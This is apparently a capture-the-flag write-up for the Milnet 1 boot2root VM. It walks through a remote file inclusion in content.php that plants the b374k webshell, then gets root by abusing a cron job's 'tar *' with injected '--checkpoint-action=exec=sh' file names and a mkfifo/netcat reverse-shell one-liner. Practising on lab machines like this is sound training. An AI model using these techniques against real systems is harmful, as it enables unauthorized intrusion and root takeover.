Milnet 1 Writeup

This time, I'm doing Milnet 1  boot2root.

Starting off, we nmap the host for any open ports and services.

[email protected]:~/b374k# nmap -A -T4 -sV -p- -v

Starting Nmap 7.12 ( ) at 2016-06-06 19:28 EEST
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.00s elapsed
Initiating NSE at 19:28
Completed NSE at 19:28, 0.00s elapsed
Initiating ARP Ping Scan at 19:28
Scanning [1 port]
Completed ARP Ping Scan at 19:28, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:28
Completed Parallel DNS resolution of 1 host. at 19:28, 0.03s elapsed
Initiating SYN Stealth Scan at 19:28
Scanning [65535 ports]
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Completed SYN Stealth Scan at 19:28, 2.47s elapsed (65535 total ports)
Initiating Service scan at 19:28
Scanning 2 services on
Completed Service scan at 19:29, 6.01s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against
NSE: Script scanning
Initiating NSE at 19:29
Completed NSE at 19:29, 0.72s elapsed
Initiating NSE at 19:29
Completed NSE at 19:29, 0.01s elapsed
Nmap scan report for
Host is up (0.00042s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9b:b5:21:38:96:7f:85:bd:1b:aa:9a:70:cf:db:cd:36 (RSA)
|_  256 93:30:be:c2:af:dd:81:a8:25:2b:57:e5:01:49:91:57 (ECDSA)
80/tcp open  http    lighttpd 1.4.35
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:34:DC:3A (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.087 days (since Mon Jun  6 17:24:13 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.42 ms

NSE: Script Post-scanning.
Initiating NSE at 19:29
Completed NSE at 19:29, 0.00s elapsed
Initiating NSE at 19:29
Completed NSE at 19:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 14.97 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

So, SSH and port 80 with an Apache webserver listening. Let's take a look at the site.

Nice logo and concept. Let's see what we can find out about it.

I fire up Arachni (the greek word for spider) web vulnerability scanner and take a shot at the site with her.

Arachni was able to identify a remote file inclusion vulnerability in content.php.

As shown in arachni's findings, an external file was successfully included using route parameter when a POST request is made for "content.php" of the site. Let's take a closer look.

Dirbuster shows only a few php files, the ones that we see when navigating the site with the buttons on the left navbar.

I decide to inspect more closely with a proxy to intercept the requests I am making and see what is going on.

With burp, we intercept the request that is made when hitting one of the buttons in the navbar and we see that by hitting the button, we are making a POST request for "content.php" with the parameter that matches one of the filenames we found with dirbuster. By trying the other buttons and making a few more requests we see that every value of the parameter is the name of  one of the php files we found earlier.

So, we know that we can include an external file in the application by having it's name in the post parameter, and expecting the webserver to shuffix it with ".php".

I decide to create a little php script to upload myself a webshell on the target. First things first however, If I create the php script locally as it is, when the request is made by the target server it will run on my host. To fix that, I need to make my apache simply treat php code as plain text.

To do that, I need to have the following lines commented out in "/etc/apache2/mods-enabled/php5.conf"

#<FilesMatch ".+\.ph(p[345]?|t|tml)$">
#    SetHandler application/x-httpd-php

Then, I need to create a little php script in my /var/www/html folder with the following code

system('ls -l');

We are telling milnet's webserver to download the file bb.php which is a copy of b374k webshell that resides in my local webserver and list the files so that we know it has been downloaded.

Back to burp, with repeater this time, we repeat the previous request, but this time, we set "route" to the location of my previous script called "installshell.php". I don't include the shuffix ".php" since the target server will include that for us.

As seen in the response, the request was successful, the webshell has been downloaded and resides in the same folder as the other php files on the server, (since we have write permissions on the directory thankfully) and we can see all that because "ls" was run on the target machine.

At this point I fire up the webshell and start enumerating the host.

After some time has passed I come accross the following intersting lines in a local user's home directory.

/home/langman/SDINET/>ls -l
total 388
-rw-rw-r-- 1 langman langman  74745 Feb  3  1992 DCA_Circular.310-P115-1
-rw-rw-r-- 1 langman langman  21837 Jun 26  2014 DefenseCode_Unix_WildCards_Gone_Wild.txt
-rw-rw-r-- 1 langman langman  46170 Sep 21  2009 FUN18.TXT
-rw-rw-r-- 1 langman langman   6337 Jun 15  2001 compserv.txt
-rw-rw-r-- 1 langman langman    766 May 24  1994 fips-index.
-rw-rw-r-- 1 langman langman 108282 Sep 30  1991 fips_500_166.txt
-rw-rw-r-- 1 langman langman  23135 Sep 30  1991 fips_500_169.txt
-rw-rw-r-- 1 langman langman  25048 Sep 30  1991 fips_500_170.txt
-rw-rw-r-- 1 langman langman  16044 Sep 30  1991 fips_500_171.txt
-rw-rw-r-- 1 langman langman   7534 Sep 30  1999 pentagon.txt
-rw-rw-r-- 1 langman langman   2894 Jul 10  1991 sec-8901.txt
-rw-rw-r-- 1 langman langman   3451 Jul 10  1991 sec-8902.txt
-rw-rw-r-- 1 langman langman  13214 May 21 22:19 sec-9540.txt
-rw-rw-r-- 1 langman langman  19858 May 21 22:15 sec-9720.txt

The list consists of many text files with interesting content. What is more interesting is the content of "DefenseCode_Unix_WildCards_Gone_Wild.txt". The text talks specifically about the exploitation of the way chown, chmod, tar and rsync work.

I note that and move on with the enumeration keeping in mind that something interesting about these commands might be found.

When I take a look at crontab there is an interesting entry that is easy to miss at first sight.

/home/langman/SDINET/>cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.


# m h dom mon dow user command
*/1 *  * * *  root /backup/
17 * * * * root    cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

/home/langman/SDINET/>cat /backup/
cd /var/www/html
tar cf /backup/backup.tgz *

What we have here, is a script that takes a backup of milnet's webroot using tar, and said script is run as root. So I decide to take a closer look at that text file that was found earlier about tar. That is section 4.3 of the file.

===[ 4.3 Tar arbitrary command execution 

Previous example is nice example of file ownership hijacking. Now, let's go to even 
more interesting stuff like arbitrary command execution. Tar is very common unix program 
for creating and extracting archives.
Common usage for lets say creating archives is:

[[email protected] public]# tar cvvf archive.tar *

So, what's the problem with 'tar'? 
Thing is that tar has many options, and among them, there some pretty interesting
options from arbitrary parameter injection point of view.

Let's check tar manual page (man tar):

              display progress messages every NUMBERth record (default 10)

              execute ACTION on each checkpoint

There is '--checkpoint-action' option, that will specify program which will
be executed when checkpoint is reached. Basically, that allows us arbitrary
command execution.

Arbitrary command execution using tar. And since tar is run as root, this could be what I need to gain the privileges I long for.

First of, I start a local netcat listener.

[email protected]:~# nc -luv -p 1337
listening on [any] 1337 ...

Then, I move over to the webshell's terminal and i create the needed files in milnet's webroot.

/var/www/html/>echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 1337 >/tmp/f" >
/var/www/html/>touch "/var/www/html/--checkpoint-action=exec=sh"
/var/www/html/>touch "/var/www/html/--checkpoint=1"

With the files in place, I sit around and wait for the cronjob to run, and after about a minute on my netcat listener...:

[email protected]:~# nc -lv -p 1337
listening on [any] 1337 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 59042
bash: cannot set terminal process group (12216): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/var/www/html#

So, let's go grab the flag!

[email protected]:/var/www/html# cd
[email protected]:~# ls -l
ls -l
total 4
-rw-r--r-- 1 root root 1727 May 21 22:42 credits.txt

And finally:

[email protected]:~# cat credits.txt
cat credits.txt
      ,/   .`|                                                               
    ,`   .'  :  ,---,                          ,---,.                        
  ;    ;     /,--.' |                        ,'  .' |                  ,---, 
.'___,/    ,' |  |  :                      ,---.'   |      ,---,     ,---.'| 
|    :     |  :  :  :                      |   |   .'  ,-+-. /  |    |   | : 
;    |.';  ;  :  |  |,--.   ,---.          :   :  |-, ,--.'|'   |    |   | | 
`----'  |  |  |  :  '   |  /     \         :   |  ;/||   |  ,"' |  ,--.__| | 
    '   :  ;  |  |   /' : /    /  |        |   :   .'|   | /  | | /   ,'   | 
    |   |  '  '  :  | | |.    ' / |        |   |  |-,|   | |  | |.   '  /  | 
    '   :  |  |  |  ' | :'   ;   /|        '   :  ;/||   | |  |/ '   ; |:  | 
    ;   |.'   |  :  :_:,''   |  / |        |   |    \|   | |--'  |   | '/  ' 
    '---'     |  | ,'    |   :    |        |   :   .'|   |/      |   :    :| 
              `--''       \   \  /         |   | ,'  '---'        \   \  /   
                           `----'          `----'                  `----'    

This was milnet for #vulnhub by @teh_warriar
I hope you enjoyed this vm!

If you liked it drop me a line on twitter or in #vulnhub.

I hope you found the clue:
I was sitting on the idea for using this technique for a BOOT2ROOT VM prives for a long time...

This VM was inspired by The Cuckoo's Egg. 
If you have not read it give it a try:

All in all, a great vm that informed me about a potential exploitation of standard linux programs that hadn't crossed my mind. Also, it pointed me to a very interesting read!

Great thanks go to @teh_warriar for creating this vm and as always to Vulnhub for hosting it.